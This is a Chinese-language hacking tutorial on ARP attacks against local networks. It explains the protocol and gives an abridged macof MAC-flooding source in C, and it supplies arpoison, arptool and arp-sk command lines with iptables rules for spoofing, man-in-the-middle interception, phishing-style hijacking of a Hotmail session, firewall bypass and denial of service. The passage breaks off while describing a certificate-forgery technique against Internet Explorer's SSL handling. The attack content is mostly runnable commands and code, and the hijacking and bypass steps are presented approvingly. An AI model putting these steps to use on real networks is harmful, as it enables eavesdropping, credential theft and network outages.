戰(zhàn)術(shù)攻防之近距離搏擊篇(ARP)攻擊

作者:紫天星

生活在網(wǎng)絡(luò)時(shí)代里， 我們的生活里多了黑客這樣一群神秘人物。 傳說(shuō)中他們放蕩不羈， 崇尚自我并行事詭異， 攪動(dòng)著整個(gè)網(wǎng)絡(luò)命脈， 使其生機(jī)無(wú)限。 然而現(xiàn)實(shí)中， 他們超然的生活于我們周?chē)��? 假想在一間忙碌的Office中， 每個(gè)員工在自己狹窄的工作空間中埋頭于自己手頭的事物；能聽(tīng)到的聲音是手指在鍵盤(pán)揮舞的呵咔聲和此起彼伏的電話(huà)鈴， 有誰(shuí)有注意到那狹窄的個(gè)人空間里， 思維的放任超乎尋常。 飛快的手指間， 各種指令和運(yùn)作的程序隊(duì)列般的游行著。 表面上似乎一切都正常， 然而， 或許那里正進(jìn)行著激烈的電子對(duì)抗……。

SANS公布2001來(lái)自于內(nèi)部入侵攻擊雖然只占30%左右， 然而產(chǎn)生的危害也最大， 因此局域網(wǎng)絡(luò)的入侵和滲透更具有實(shí)足的硝煙氣息。 利用二層鏈路上ARP協(xié)議漏洞而產(chǎn)生的各種攻擊方式無(wú)疑是局部網(wǎng)絡(luò)戰(zhàn)爭(zhēng)最精妙的特技。

一、 基礎(chǔ)知識(shí)預(yù)備

精巧程序的后面藏匿著簡(jiǎn)單的原理和聰穎的智慧。 為了順利闡述ARP本身的協(xié)議漏洞以及后面將要闡述的各種ARP攻擊思維(同時(shí)， 我必須顧及那些初次接觸網(wǎng)絡(luò)的朋友， 以致不挫傷他們對(duì)網(wǎng)絡(luò)攻擊防御的興趣)， 我們將粗淺的概覽ARP協(xié)議和相關(guān)的網(wǎng)絡(luò)鏈路層的一些概念。

ARP(Address Resolution Protocol)簡(jiǎn)稱(chēng)地址解析協(xié)議， 主要用于把以太網(wǎng)卡硬件地址和IP地址捆綁起來(lái)。 當(dāng)主機(jī)之間發(fā)生通信要求， 則ARP協(xié)議通過(guò)廣播請(qǐng)求/單播回應(yīng)方式建立主機(jī)間通信連接。 大家熟悉的IP地址采用32位長(zhǎng)度， 在以太局域網(wǎng)中網(wǎng)卡設(shè)備地址是48位長(zhǎng)度(也稱(chēng)為MAC地址)。 一張稱(chēng)為ARP緩存的表單用于維護(hù)MAC地址和其所對(duì)應(yīng)的IP地址的相關(guān)性。 ARP則提供用于在網(wǎng)絡(luò)設(shè)備間進(jìn)行地址轉(zhuǎn)換和創(chuàng)造MAC-IP相關(guān)性的協(xié)議規(guī)則。

網(wǎng)絡(luò)鏈路層的建立通信關(guān)系的準(zhǔn)則：網(wǎng)絡(luò)主機(jī)A欲與網(wǎng)絡(luò)主機(jī)C建立通信連接， 主機(jī)A在網(wǎng)絡(luò)中廣播ARP的請(qǐng)求數(shù)據(jù)包(REQUEST)， 如圖一：

主機(jī)A欲與IP地址為192.168.1.3的目標(biāo)主機(jī)通信， 則發(fā)送的廣播的數(shù)據(jù)包中包含本身的IP地址、網(wǎng)卡的MAC地址、目標(biāo)主機(jī)的IP地址以及廣播MAC地址(FF-FF-FF-FF-FF-FF)。

(注：Mac地址是媒體接入層上使用的地址， 直觀(guān)的概念就是網(wǎng)卡的物理地址， Mac地址一般都采用6字節(jié)48bit。 )

主機(jī)C接收到ARP的REQUEST廣播包， 發(fā)現(xiàn)目標(biāo)地址中IP地址與自身IP地址一致， 接收該數(shù)據(jù)請(qǐng)求， 并作出響應(yīng)。

從圖二中， 可以看到主機(jī)C發(fā)現(xiàn)主A的ARP請(qǐng)求符合要求， 在自身ARP緩存表中添加主機(jī)A的IP-MAC綁定映像記錄， 并發(fā)送單播ARP回應(yīng)數(shù)據(jù)包(RELAY)給主機(jī)A。 主機(jī)A接收到回應(yīng)數(shù)據(jù)包， 更新其ARP緩存表記錄， 綁定主機(jī)C的IP-MAC映像記錄。 至此， 二層通信關(guān)系建立完畢。 而網(wǎng)絡(luò)中其他主機(jī)則忽略此請(qǐng)求包。

這種關(guān)系可以類(lèi)似于情景會(huì)話(huà)↓

主機(jī)A：嗨， 誰(shuí)主機(jī)的IP地址是192.168.1.3?

主機(jī)B：嗨， 我主機(jī)地址是192.168.1.3,我的門(mén)牌號(hào)是00-50-56-C0-08， 記得來(lái)找我啊。

其他主機(jī)：NO， 這不是我的IP地址。

從原理分析發(fā)覺(jué)ARP本身是無(wú)類(lèi)協(xié)議， 本身不能攜帶任何狀態(tài)信息。 因此ARP協(xié)議不能進(jìn)行任何認(rèn)證， 這樣就導(dǎo)致協(xié)議本身具有安全威脅性。 造成這種安全威脅的歷史原因在于：早先的網(wǎng)絡(luò)創(chuàng)造者們是在一個(gè)平和自由的環(huán)境中設(shè)計(jì)ARP協(xié)議， 因而安全問(wèn)題在當(dāng)時(shí)幾乎是瑣碎的事情。 然而網(wǎng)絡(luò)集聚膨脹， 破壞性攻擊和入侵事件的增加， 使得ARP協(xié)議脆弱不堪。

了解ARP工作原理之后， 可以得出：大部分網(wǎng)絡(luò)系統(tǒng)中的ARP緩存列表根據(jù)所接收的ARP REPLAY數(shù)據(jù)包動(dòng)態(tài)增加或更新緩存表中IP-MAC映射記錄。 根據(jù)這樣一條簡(jiǎn)單規(guī)則， 我們將看到各種絢麗的入侵和攻擊手法。

二、 攻擊分類(lèi)

*ARP緩存中毒

這是個(gè)非常有意思的標(biāo)題—“中毒”， 這能讓我聯(lián)想到霉綠色的空氣和腐銹的紅色河水， 畢竟地球區(qū)域生態(tài)環(huán)境令人擔(dān)心?。

ARP緩存中毒其實(shí)質(zhì)并沒(méi)有字面含義那么可怕。 還記得前面所提高過(guò)ARP緩存表的概念吧， 事實(shí)上每個(gè)網(wǎng)絡(luò)設(shè)備都有一個(gè)APR表， 其中臨時(shí)記錄著匹配的設(shè)備MAC和IP地址映射對(duì)。 它保證這些記錄具有唯一性， 即一個(gè)IP只單獨(dú)映射一個(gè)MAC。 又由于ARP本身不具備認(rèn)證信任機(jī)制， 因此欺騙行為變的泛濫。 當(dāng)網(wǎng)絡(luò)設(shè)備發(fā)送ARP REQUEST時(shí)， 它完全相信ARP REPLY回應(yīng)是來(lái)自于正確設(shè)備， 因?yàn)樗�不能�?yàn)證回應(yīng)數(shù)據(jù)包是否確切從正確的設(shè)備發(fā)送的。 更糟糕的是， 許多操作系統(tǒng)并不需要發(fā)送ARP請(qǐng)求數(shù)據(jù)包就直接承認(rèn)其他設(shè)備發(fā)送的ARP回應(yīng)數(shù)據(jù)包。

這樣垃圾方式的設(shè)計(jì)讓入侵變的肆意， 而防御卻無(wú)奈了許多。 假設(shè)我是一個(gè)黑帽， 我知道ARP并無(wú)驗(yàn)證行為， 而且系統(tǒng)不需要發(fā)送請(qǐng)求數(shù)據(jù)包就可接收ARP的回應(yīng)數(shù)據(jù)包。 我會(huì)怎么做？創(chuàng)建一個(gè)貌似合法的ARP REPLY數(shù)據(jù)包， 其中偽造我所希望的MAC和IP地址， 并發(fā)送給盲目接收此類(lèi)數(shù)據(jù)包的主機(jī)系統(tǒng)。 結(jié)果， 這種方式欺騙主機(jī)使其更新我所希望的MAC-IP地址映射對(duì)。 當(dāng)然， 我可以肆意廣播這種ARP REPLY數(shù)據(jù)包， 愚弄整個(gè)網(wǎng)絡(luò)系統(tǒng)所有主機(jī)(?冷)。

現(xiàn)在你知道了ARP的一個(gè)小技巧， 我們稱(chēng)其為：ARP緩存中毒。 正是通過(guò)它， 無(wú)數(shù)的發(fā)明創(chuàng)造出來(lái)， 正如輪子的發(fā)明可以和人類(lèi)登月媲美， 簡(jiǎn)單的發(fā)明可以翹動(dòng)地球。

*MAC泛洪攻擊(Flooding)

現(xiàn)在的網(wǎng)絡(luò)結(jié)構(gòu)大多數(shù)使用交換方式(Switched)結(jié)構(gòu)取代早先的的廣播方式(Broadcast)， 這樣的優(yōu)勢(shì)在于交換機(jī)不會(huì)向每個(gè)端口無(wú)聊的推送廣播風(fēng)暴， 它稍微智能的判斷需要推送數(shù)據(jù)的端口， 這讓那些層在HUB方式連接的下大顯神威的嗅探器(snffer)感到憋足。

然而進(jìn)步的力量有時(shí)候令“安全”變的很嬌嫩。 交換機(jī)啟用端口安全特性(Port security)需要消耗部分的CPU， 當(dāng)交換處理超負(fù)載后， 交換機(jī)就無(wú)法處理端口安全， 此時(shí)交換機(jī)陷入了HUB模式， 數(shù)據(jù)被簡(jiǎn)單的廣播到網(wǎng)絡(luò)中的每臺(tái)計(jì)算機(jī)中， 于是竊聽(tīng)活動(dòng)仍然可以繼續(xù)。 于是利用大量的偽造ARP REQUEST數(shù)據(jù)包對(duì)交換機(jī)的ARP表進(jìn)行泛洪攻擊(ARP緩存表中毒的典型運(yùn)用)， 可以輕易使很多廠(chǎng)商交換機(jī)負(fù)荷過(guò)載(CISCO 1900和3COM superstackII就容易遭受攻擊)， 此刻交換機(jī)處于類(lèi)似HUB工作方式， 因而可輕松使用包嗅探器刺探整個(gè)網(wǎng)絡(luò)。

macof的小程序輕松了實(shí)現(xiàn)了這樣的功能， 其代碼實(shí)現(xiàn)如下：

---------------snip-------------------

/* 本程序的作者是Dug Songdugsong@m.org， 由于這里只需要實(shí)現(xiàn)MAC FLOODING的攻擊， 所以我對(duì)程序做了精簡(jiǎn)， 便于讀者直觀(guān)了解MAC FLOODING的攻擊原理。 另外， macof的最早作者是Ian Vitek， 采用Perl進(jìn)行編寫(xiě)的， 我在軟件包中收錄了這兩個(gè)程序， 提供讀者參閱。

*/

＃i nclude "config.h"

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude "version.h"

extern char *ether_ntoa(struct ether_addr *);

extern struct ether_addr *ether_aton(char *);

in_addr_t Src = 0;

in_addr_t Dst = 0;

u_char *Tha = NULL;

u_short Dport = 0;

u_short Sport = 0;

char   *Intf = NULL;

int Repeat = -1;  //導(dǎo)致偽造MAC的無(wú)限循環(huán)

void usage(void) {

fprintf(stderr, "Version: " VERSION "\n"

"Usage: macof ");

exit(1);

}

void gen_mac(u_char *mac) {

    //產(chǎn)生隨機(jī)MAC地址

*((in_addr_t *)mac) = libnet_get_prand(PRu32);

*((u_short *)(mac + 4)) = libnet_get_prand(PRu16);

}

int main(int argc, char *argv[]) {

int c, i;

struct libnet_link_int *llif;

char ebuf[PCAP_ERRBUF_SIZE];

u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN];

in_addr_t src, dst;

u_short sport, dport;

u_int32_t seq;

u_char pkt[ETH_H + IP_H + TCP_H];

if (!Intf && (Intf = pcap_lookupdev(ebuf)) == NULL)

errx(1, "%s", ebuf);

if ((llif = libnet_open_link_interface(Intf, ebuf)) == 0)

errx(1, "%s", ebuf);

libnet_seed_prand();

for (i = 0; i != Repeat; i++) { 

gen_mac(sha);

    gen_mac(tha);

    src = libnet_get_prand(PRu32);

dst = libnet_get_prand(PRu32);

sport = libnet_get_prand(PRu16);

dport = libnet_get_prand(PRu16);

seq = libnet_get_prand(PRu32);

//偽造貌似合法MAC地址

libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, pkt);

libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 64,

   IPPROTO_TCP, src, dst, NULL, 0, pkt + ETH_H);

libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512,

    0, NULL, 0, pkt + ETH_H + IP_H);

libnet_do_checksum(pkt + ETH_H, IPPROTO_IP, IP_H);

libnet_do_checksum(pkt + ETH_H, IPPROTO_TCP, TCP_H);

if (libnet_write_link_layer(llif, Intf, pkt, sizeof(pkt)) < 0)

  errx(1, "write");

fprintf(stderr, "%s ",

  "源MAC地址："ether_ntoa((struct ether_addr *)sha));

fprintf(stderr, "%s\n %s:%d > %s:%d\n",

  "目標(biāo)MAC地址："ether_ntoa((struct ether_addr *)tha),

  "源IP地址/端口："libnet_host_lookup(Src, 0), sport,

  "目標(biāo)IP地址/端口："libnet_host_lookup(Dst, 0), dport);

}

exit(0);

}

-----------------snip end-----------------------------

#macof 測(cè)試

[root@hackersvr /]# macof

源MAC地址：77:6b:e1:6e:5e:8c目標(biāo)MAC地址：93:2d:ed:45:f9:e3

源IP地址/端口：0.0.0.0:45702目標(biāo)IP地址/端口0.0.0.0:11000

源MAC地址：84:a4:d3:57:ef:8目標(biāo)MAC地址：12:56:52:42:dc:95

源IP地址/端口：0.0.0.0:16630目標(biāo)IP地址/端口0.0.0.0:3031

源MAC地址：f0:9:3f:18:89目標(biāo)MAC地址：1d:86:53:53:d7:f8

源IP地址/端口：0.0.0.0:15535目標(biāo)IP地址/端口0.0.0.0:7466

…………

此程序偽裝大量ARP回應(yīng)數(shù)據(jù)包， 導(dǎo)致交換機(jī)過(guò)載處理， 因而陷入HUB方式處理數(shù)據(jù)包， Port Security特性失效。 通過(guò)這種方式導(dǎo)致網(wǎng)絡(luò)安全再度陷入了竊聽(tīng)的恐慌之中(注意：本程序只做實(shí)驗(yàn)用途， 嚴(yán)禁使用于任何工作環(huán)境， 否則將導(dǎo)致網(wǎng)絡(luò)癱瘓或交換機(jī)硬件重置)。

*ARP欺騙行為

雖然MAC泛洪的攻擊方式帶了一些恐慌， 但是由于這種方式在很多場(chǎng)合成功概率不高， 且這種攻擊方式太過(guò)于激進(jìn)， 以至于聰明的網(wǎng)管能很快分析網(wǎng)絡(luò)并馬上制止這種行為的擴(kuò)散， 因此一種稱(chēng)之為ARP欺騙的隱蔽的ARP中毒演變攻擊進(jìn)入了Cyber空間。

首先假設(shè)一個(gè)場(chǎng)景：假如主機(jī)A要想獲得主機(jī)B的MAC， 它需發(fā)送arp-request數(shù)據(jù)包到廣播地址， 主機(jī)B會(huì)以自身地址回應(yīng)這個(gè)請(qǐng)求。 但假如主機(jī)C在主機(jī)B之前作出回應(yīng)。 主機(jī)A則在其緩存中設(shè)置主機(jī)C的MAC地址。

12:50:31.198300 arp who-has hostB tell hostA   [1]

12:50:31.198631 arp reply hostC is-at 4e:73:02:4b:3f:94  [2]

于是我們構(gòu)造了欺騙行為， 但由于主機(jī)A發(fā)送的是廣播包， 因此主機(jī)B也會(huì)應(yīng)答：

12:50:31.198862 arp reply hostB is-at 4e:80:51:d1:5e:f5  [3]

那么主機(jī)A的ARP緩存很有可能被刷新， 但是由于緩存的無(wú)驗(yàn)證即時(shí)更新機(jī)制， 只要主機(jī)C不斷發(fā)送偽造的回應(yīng)包， 那么主機(jī)A的緩存列表中就能一直保存主機(jī)C的MAC地址。 (假如主機(jī)不發(fā)送arp-request， 向其發(fā)送arp-reply并無(wú)太大意思， 因?yàn)榫彺娌粫?huì)更新一個(gè)不存在的記錄)。 其實(shí)現(xiàn)原理如圖：

了解ARP欺騙的方式后， 其準(zhǔn)確定義如下：利用以太和IP協(xié)議之間的交互關(guān)系而形成的攻擊方法， 比如， 偽造目標(biāo)計(jì)算機(jī)的MAC地址以獲取其控制權(quán)。 其表現(xiàn)形式為構(gòu)造虛假arp-request和arp-reply數(shù)據(jù)包以實(shí)現(xiàn)欺騙目的。

這種欺騙方式主要用于交換網(wǎng)絡(luò)結(jié)構(gòu)(對(duì)于HUB結(jié)構(gòu)， 可以直接對(duì)目標(biāo)主機(jī)進(jìn)行強(qiáng)制控制， 使用欺騙方式似乎是種累贅),因此交換網(wǎng)的堅(jiān)固性似乎變的脆弱很多。

使用arpoison小程序可以發(fā)送自定義硬件和IP地址的arp-reply包給目標(biāo)主機(jī)， 對(duì)其實(shí)行欺騙行為。

[root@hackersvr arpoison]# ./arpoison –I eth0 –d {hostA_ipaddr} –s {hostB_ipaddr}

–t 00:13:0E:19:85:03 –r {hostC_mac_addr}

ARP packet sent via eth0

# 1、主機(jī)C大量使用自己MAC回應(yīng)主機(jī)A的請(qǐng)求， 導(dǎo)致主機(jī)A被蒙騙與主機(jī)進(jìn)行通信。

# 2、假如{- r}參數(shù)所設(shè)置的MAC為一個(gè)不存在的MAC地址， 則會(huì)導(dǎo)致主機(jī)B與主機(jī)C之間的TCP

# 會(huì)話(huà)臨時(shí)性強(qiáng)行斷開(kāi)。

# 3、假如想更新網(wǎng)絡(luò)中所有主機(jī)系統(tǒng)， 可以發(fā)送廣播MAC地址FF:FF:FF:FF:FF:FF

*中間人攻擊(Man In the Middle， MIM)

在ARP方式的攻擊， 最有意思的環(huán)節(jié)莫過(guò)于MIM， 這種非常隱蔽方式可以在兩臺(tái)通信的計(jì)算機(jī)之間進(jìn)行橋接方式的監(jiān)聽(tīng)， 并且非常不容易被發(fā)現(xiàn)， 可謂是偷盜學(xué)術(shù)上的典范運(yùn)用。

攻擊原理如圖：

攻擊者駁接本地網(wǎng)絡(luò)， 分別向主機(jī)A和主機(jī)B發(fā)送適當(dāng)?shù)膫卧霢rp-reply包， 蒙蔽其所認(rèn)為的正確的通信目標(biāo)， 并建立轉(zhuǎn)發(fā)規(guī)則， 實(shí)現(xiàn)主機(jī)A與主機(jī)B之間的數(shù)據(jù)通信。 使數(shù)據(jù)鏈路表面上看似A與B的正常通信， 實(shí)則通過(guò)了攻擊者的機(jī)器進(jìn)行代理轉(zhuǎn)發(fā)。

采用arptool可以輕松實(shí)現(xiàn)這類(lèi)入侵方式：

# arptool用法: arptool

#                用于發(fā)送數(shù)據(jù)包的網(wǎng)卡

#                  發(fā)送的ARP類(lèi)型包

#         tell    arp-reply類(lèi)型數(shù)據(jù)包

#         bcast   當(dāng)攻擊對(duì)象是linux操作系統(tǒng)， 可使用此參數(shù)代替tell

# /        目標(biāo)IP/MAC地址對(duì)

# /        源IP/MAC地址對(duì)

# 1、分別對(duì)主機(jī)A/B實(shí)施ARP攻擊

[root@hackersvr arptool]#ping 192.168.1.1

[root@hackersvr arptool]#ping 192.168.1.2

[root@hackersvr arptool]#arp –a

?(192.168.1.1) at 01.01.01.01.01.01 [ether] on eth0

?(192.168.1.2) at 02.02.02.02.02.02 [ether] on eth0

[root@hackersvr arptool]# ./arptool eth0 tell 192.168.1.1 01:01:01:01:01:01 192.168.1.2 03:03:03:03:03:03

[root@hackersvr arptool]#./arptool eth0 tell 192.168.1.2 02:02:02:02:02:02 192.168.1.1 03:03:03:03:03:03

# 現(xiàn)在我們可以透明代理主機(jī)A/B之間的應(yīng)用程序數(shù)據(jù)通信?， 比如攻擊者可以修改主機(jī)A/B之

# 間的HTTP事務(wù)提交， 但這需要我們?cè)谄溟g建立橋接轉(zhuǎn)發(fā)關(guān)系。

# 2、橋接主機(jī)A/B之間通信

[root@hackersvr arptool]＃e cho 1 > /proc/sys/net/ipv4/ip_forward

[root@hackersvr arptool]#iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2 -d 192.168.1.1 --dport 80 -j REDIRECT --to-port 80

# 通過(guò)這種方式， 我們可以監(jiān)聽(tīng)、修改、切斷和劫持主機(jī)A/B之間的任何應(yīng)用通信數(shù)據(jù)， 似乎整

# 個(gè)網(wǎng)絡(luò)陷落在一種前所未有的慌亂之中。

*知識(shí)組合攻擊

   arp-sk在arp方式攻擊中， 享有“瑞士軍刀”的美譽(yù)， 它可以維護(hù)所有設(shè)備的ARP表。 通過(guò)發(fā)送適合的ARP數(shù)據(jù)包， 它可以實(shí)現(xiàn)ARP的所有類(lèi)型攻擊， 非常強(qiáng)悍的工具。 本節(jié)將采用arp-sk講解會(huì)話(huà)劫持、偷越防火墻和拒絕服務(wù)攻擊的思維方式。

1、 代理會(huì)話(huà)劫持(hijacking)

# 攻擊者架設(shè)HTTP服務(wù)器模擬遠(yuǎn)程網(wǎng)站的一部分站點(diǎn)(這部分網(wǎng)頁(yè)用于劫持主機(jī)B客戶(hù)輸入相關(guān)信

# 息， 例如用戶(hù)名或ID)。 而不需要模擬的站點(diǎn)則代理轉(zhuǎn)發(fā)至真實(shí)站點(diǎn)， 這種高超的詐騙技巧非常

# 隱蔽。 當(dāng)我們盡情享受網(wǎng)絡(luò)沖浪的愉快時(shí)， 誰(shuí)會(huì)想到這是個(gè)陷阱？

# 發(fā)送arp-reply分別攻擊防火墻和目標(biāo)主機(jī)

[root@hackersvr arp-sk]# ./arp-sk -r -d 192.168.1.2 -S 192.168.1.4 -D 192.168.1.2

+ Running mode "reply"

+ IfName: eth0

+ Source MAC: 03:03:03:03:03:03

+ Source ARP MAC: 03:03:03:03:03:03

+ Source ARP IP : 192.168.1.4 (gateway)

+ Target MAC: 02:02:02:02:02:02

+ Target ARP MAC: 02:02:02:02:02:02

+ Target ARP IP : 192.168.1.2 (hostB)

[...]

[root@hackersvr arp-sk]# ./arp-sk -r -d 192.168.1.4 -S 192.168.1.2 -D 192.168.1.4

+ Running mode "reply"

+ IfName: eth0

+ Source MAC: 03:03:03:03:03:03

+ Source ARP MAC: 03:03:03:03:03:03

+ Source ARP IP : 192.168.1.4 (hostB)

+ Target MAC: 04:04:04:04:04:04

+ Target ARP MAC: 04:04:04:04:04:04

+ Target ARP IP : 192.168.1.4 (gateway)

[...]

# 代理轉(zhuǎn)發(fā)非hotmail(207.68.171.233)的一切站點(diǎn)(攻擊者模擬hotmail站點(diǎn)， 偽裝提供服務(wù))

[root@hackersvr arp-sk]# iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2 \

-d !207.68.171.233 --dport 80 -j REDIRECT --to-port 80

# 當(dāng)使用轉(zhuǎn)發(fā)設(shè)置， 目標(biāo)主機(jī)使用ping命令可以檢測(cè)到其數(shù)據(jù)包的重定向， 因此這里阻擋icmp重

# 定向的信息。

[root@hackersvr arp-sk]# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects

# OK， 剩下的事情就是如何如何使用嗅探工具、數(shù)據(jù)捕獲工具或自行定義的腳本來(lái)觀(guān)測(cè)目標(biāo)主機(jī)的# 沖浪行為， 并可以掌握他所有一切上網(wǎng)信息， 諸如：郵件帳戶(hù)、論壇ID等。 (這些使用方法超出

# 本文所論述的arp攻擊行為， 不予討論)

2、 偷越防火墻

# 網(wǎng)絡(luò)權(quán)利的不均衡總?cè)囚[一些自負(fù)的家伙。 由于網(wǎng)管的存在和防火墻的規(guī)則的設(shè)置， 使得某些具

# 有特權(quán)的計(jì)算機(jī)才能任意的訪(fǎng)問(wèn)整個(gè)互連網(wǎng)， 這為其它機(jī)器的使用者潛埋下嫉妒和羨慕的心理成

# 分。 為了反擊這種權(quán)利不均衡， Arp方式的欺騙訪(fǎng)問(wèn)再一次獲得成功！?

# 原理圖六中， 虛線(xiàn)代表主機(jī)B的正常出網(wǎng)訪(fǎng)問(wèn)， 通過(guò)Arp攻擊后， 攻擊者以主機(jī)B的身份特權(quán)對(duì)

# 互連網(wǎng)進(jìn)行任意訪(fǎng)問(wèn)， 并分離主機(jī)B的網(wǎng)絡(luò)訪(fǎng)問(wèn)， 使主機(jī)B網(wǎng)絡(luò)訪(fǎng)問(wèn)正常無(wú)異， 防火墻的訪(fǎng)問(wèn)限

# 制形如虛設(shè)。

# 只需要對(duì)防火墻進(jìn)行攻擊， 不需要對(duì)主機(jī)B實(shí)施攻擊

[root@hackersvr arp-sk]# arp-sk -r -d 192.168.1.4 -S 192.168.1.2 -D 192.168.1.4

# 使用Linux的Netfilter框架， 很容易分離屬于攻擊者網(wǎng)絡(luò)訪(fǎng)問(wèn)流和屬于主機(jī)B的網(wǎng)絡(luò)訪(fǎng)問(wèn)流

[root@hackersvr arp-sk]# iptables -t nat -A POSTROUTING -j SNAT --to 192.168.1.2

# 一切的完美幾乎就在幾句簡(jiǎn)單的語(yǔ)句之間完成， 我想起史蒂文?列維的幾句真言：

# 1、進(jìn)入（訪(fǎng)問(wèn)）計(jì)算機(jī)應(yīng)該是不受限制的和絕對(duì)的；

# 2、一切信息都應(yīng)該是免費(fèi)的；

# 3、懷疑權(quán)威， 反對(duì)壟斷；

# 4、任何一個(gè)人都能在計(jì)算機(jī)上創(chuàng)造藝術(shù)和美；

# 5、計(jì)算機(jī)能夠使生活變得更美好

# 于是， 攻擊在此刻似乎也變的美麗了許多。

3、 拒絕服務(wù)攻擊(DoS)

# 有了上面學(xué)習(xí)過(guò)程， 這里實(shí)現(xiàn)Dos攻擊的方式變的相當(dāng)簡(jiǎn)單， 對(duì)于攻擊者所代理轉(zhuǎn)發(fā)的數(shù)據(jù)包進(jìn)

# 行阻塞， 從而達(dá)到這種卑劣的目的。 (我相當(dāng)反感這種攻擊方式， 因此我也非常討厭?cǎi){御它進(jìn)行

# 攻擊的人， 因此我希望這類(lèi)攻擊方式只用于實(shí)驗(yàn)?zāi)康模?不要濫用！)

# 利用Linux得力的iptables工具， 方便實(shí)現(xiàn)數(shù)據(jù)堵塞

[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.1 -j DROP

[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.2 -j DROP

[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.4 -j DROP

# 另一種方式是制造一個(gè)Mac”黑洞”， 既使用不存在的mac地址使目標(biāo)主機(jī)從網(wǎng)絡(luò)地圖上消失。

# 如下句法使hostA認(rèn)為hostB已經(jīng)離開(kāi)網(wǎng)絡(luò)了：

[root@hackersvr arp-sk]# arp-sk -r -d hostB -S hostA --rand-arp-hwa-src -D hostB

通過(guò)了解Arp原理， 我們發(fā)現(xiàn)這些攻擊方式非常有趣， 并且思路簡(jiǎn)單， 實(shí)現(xiàn)方法也相當(dāng)容易。 但這些小技巧不過(guò)是Arp攻擊的基礎(chǔ)層面， 下面的部分將深入討論一些Arp高級(jí)利用技巧， 其攻擊思維的精妙之處令我贊嘆不止。

三、 ARP攻擊進(jìn)階

*SSL深度刺穿

前面闡述過(guò)使用MIM攻擊方式可以在交換網(wǎng)環(huán)境中對(duì)任意主機(jī)進(jìn)行竊聽(tīng)活動(dòng)， 于是用網(wǎng)絡(luò)傳輸任何敏感數(shù)據(jù)是非常危險(xiǎn)的， 當(dāng)輸入信用卡的ID的時(shí)候， 當(dāng)發(fā)送私人郵件時(shí)， 你是否會(huì)想象這網(wǎng)絡(luò)的另一端已經(jīng)布置了陷阱， 等著你發(fā)送自動(dòng)把自己的秘密泄露呢？所以利用私鑰加密的傳輸方式變的非常風(fēng)靡， 因?yàn)槲覀兎浅Ｐ湃蜟A， 所以我們把自己放置于一個(gè)依賴(lài)“信任”的網(wǎng)絡(luò)安全環(huán)境中進(jìn)行著各種交易。

而流行的SSL協(xié)議在這種信任環(huán)境中扮演極其重要的角色， 由于其加密通道內(nèi)包含了重要資信和數(shù)據(jù)， 一時(shí)間它成為許多竊聽(tīng)高手的重要目標(biāo)。 本文將以微軟糟糕的IE為例， 講述如何從其加密的通道內(nèi)竊聽(tīng)信息。

眾所周知， 微軟總向世人鼓吹其瀏覽器128位加密的強(qiáng)大好處， 其SSL安全機(jī)制的完美。 殊不知， 由于其追求快速開(kāi)發(fā)和節(jié)約成本的代碼壓縮， 導(dǎo)致其結(jié)構(gòu)本身存在許多漏洞。 在IE的SSL實(shí)現(xiàn)中， 一個(gè)特征漏洞是可以對(duì)其進(jìn)行主動(dòng)而無(wú)法偵測(cè)的MIM攻擊， 并且瀏覽器不會(huì)給出任何警告對(duì)話(huà)框。

在構(gòu)建加密通道站點(diǎn)時(shí)候， 管理員需要產(chǎn)生一個(gè)經(jīng)過(guò)CA簽名的證書(shū)， 證書(shū)中DN部分的CN設(shè)置應(yīng)該為安全站點(diǎn)的URL地址。 如果我們想建立安全的www.hakcerxfiles.net的安全站點(diǎn)， 我們需要申請(qǐng)的證書(shū)結(jié)構(gòu)形式大體為：

[CA頒發(fā)者：VeriSign / 信任授權(quán)體：VeriSign]

->[CA頒發(fā)者：VeriSign / 信任授權(quán)體：www.hackerxfiles.net]

當(dāng)瀏覽器接收到此證書(shū)， 它會(huì)自動(dòng)驗(yàn)證CN字段和其所連接的域是否匹配、其證書(shū)是否使用了權(quán)威CA機(jī)構(gòu)的簽名。 利用MIM攻擊方式似乎很無(wú)力， 畢竟偽造一張擁有合法CN字段和合法簽名的證書(shū)困難相當(dāng)之大。

然而在現(xiàn)實(shí)當(dāng)中， 更多的CA證書(shū)機(jī)構(gòu)是以中間人的形式來(lái)辦法數(shù)字證書(shū)的。 這意味著www.hackerxfiles.net很可能得到的數(shù)字證書(shū)結(jié)構(gòu)：

[CA頒發(fā)者：VeriSign / 信任授權(quán)體：VeriSign]

->[CA頒發(fā)者：VeriSign / 信任授權(quán)體：CA中介]

->[CA頒發(fā)者：CA中介 / 信任授權(quán)體：www.hackerxfiles.net ]

當(dāng)瀏覽器接受此證書(shū)， 其會(huì)嚴(yán)整認(rèn)證分支鏈路證書(shū)的CN值是否與所連接的域名匹配、其是否被中介CA簽名、中介CA是否被權(quán)威CA記過(guò)簽名。 最后， 瀏覽器還檢查所有中介CA是否具有合法的CA基本約束(Basic Constraints， 關(guān)于證書(shū)認(rèn)證鏈路的路徑深度的概念， 具體可參閱RFC2459文檔4.2.1-10部分的解釋)。

整個(gè)認(rèn)證過(guò)程看起來(lái)很完美， 但I(xiàn)E在設(shè)計(jì)SSL的時(shí)候卻在整個(gè)認(rèn)證鏈路過(guò)程中省略CA基本約束(偷工減料無(wú)疑是制造了一個(gè)接一個(gè)垃圾功能?)。 這意味著任何擁有域的合法CA簽名證書(shū)的用戶(hù)可以為其他域產(chǎn)生一個(gè)合法的CA簽名證書(shū)(由于缺少基本約束， 瀏覽器無(wú)法判斷CA證書(shū)子結(jié)構(gòu)是中介CA機(jī)構(gòu)還是最終用戶(hù)實(shí)體)。

首先， 作為hackerxfiles的站點(diǎn)管理員， 我產(chǎn)生一個(gè)證書(shū)， 并向CA請(qǐng)求一個(gè)合法簽名：

[CA頒發(fā)者：VeriSign / 信任授權(quán)體：VeriSign]

->[CA頒發(fā)者：VeriSign / 信任授權(quán)體：www.hackerxfiles.net]

